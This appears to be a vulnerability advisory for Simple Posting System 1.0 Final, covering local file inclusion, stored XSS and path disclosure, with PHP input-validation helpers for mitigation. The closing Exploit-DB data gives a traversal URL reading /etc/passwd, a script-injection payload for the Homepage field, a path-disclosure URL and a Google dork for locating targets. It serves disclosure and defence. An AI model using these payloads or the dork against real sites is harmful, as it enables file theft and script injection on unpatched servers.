Vendor: Simple Posting System
By: n0tch aka andmuchmore
CVSS: 8.8 (HIGH)
Vulnerability Types: LFI, Persistent XSS, FPD
CWE: 22, 79, 564
Product Name: Simple Posting System
Affected Version From: 1.0 Final
Affected Version To: 1.0 Final
Patch Exists: NO
Related CWE: N/A
CPE: a:realize:simple_posting_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Linux(Ubuntu)
Year: 2012

Simple Posting System [Multiple]

Simple Posting System 1.0 Final is affected by three vulnerabilities. The first is a Local File Inclusion (LFI) that allows an attacker to read arbitrary files on the server: the vulnerable parameter is 'old', which accepts '../' sequences in the URL. The second is a Persistent XSS, which is triggered by a malicious payload entered in the 'Homepage' field. The third is a Full Path Disclosure (FPD), which is triggered by manipulating the 'aantal' parameter of the comment.php page.

Mitigation:

Input validation should be implemented to prevent malicious payloads from being executed. Access control should be implemented to restrict access to sensitive files and directories.
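
One way to implement the input validation described above for the parameters named in this advisory, as an added example that is not code from Simple Posting System. The function names, the ARCHIVE_DIR path and the way the application uses each parameter are assumptions.

```php
<?php
// Added example: hypothetical helpers, not taken from Simple Posting System.
// ARCHIVE_DIR and the meaning of each parameter are assumptions.
const ARCHIVE_DIR = '/var/www/sps/archive';

// 'old' (LFI): resolve the requested name and require that the result
// stays inside the archive directory.
function sps_resolve_old(string $old, string $base = ARCHIVE_DIR): ?string
{
    if ($old === '' || strpos($old, "\0") !== false) {
        return null;                 // empty value or embedded NUL byte
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $old);
    if ($baseReal === false || $target === false || !is_file($target)) {
        return null;                 // missing base, missing file, or not a regular file
    }
    // realpath() has collapsed every "../", so a prefix check is reliable here.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// 'Homepage' (persistent XSS): store only http(s) URLs. Validation alone
// does not make the value safe to print, so sps_html() is still required.
function sps_clean_homepage(string $url): ?string
{
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Encode every stored field on output; older rows may already hold markup.
function sps_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 'id' / 'aantal' (path disclosure): accept only bounded integers, so an
// unexpected value is rejected before it can reach code that raises a warning.
function sps_int_param(array $query, string $name, int $min, int $max): ?int
{
    $v = filter_var($query[$name] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}
```

Each helper returns null on rejection, so the caller can answer with a generic error page; running production with display_errors disabled keeps any remaining PHP warning from printing a server path.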

Exploit-DB raw data:

# Exploit Title: Simple Posting System [Multiple]
# Google Dork: inurl:sps.php?old= or inurl:sps.php "
# Date: 14/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://realize.be/files/sps.tar.gz
# Version: 1.0 Final
# Tested on:  Windows 7 / Linux(Ubuntu)


+[-- LFI --]+

http://localhost/sps.php?old=../../../../../../../../../../../../../../../../../etc/passwd%00

+[-- Persistent XSS --]+

Vulnerable Field = "Homepage"
Payload syntax: ><script>alert('XSS');</script>

+[-- FPD --]+

http://localhost/sps/sps_admin/comment.php?op=del&id=3&aantal=4

+[-- Shoutz --]+

All the belegit crew..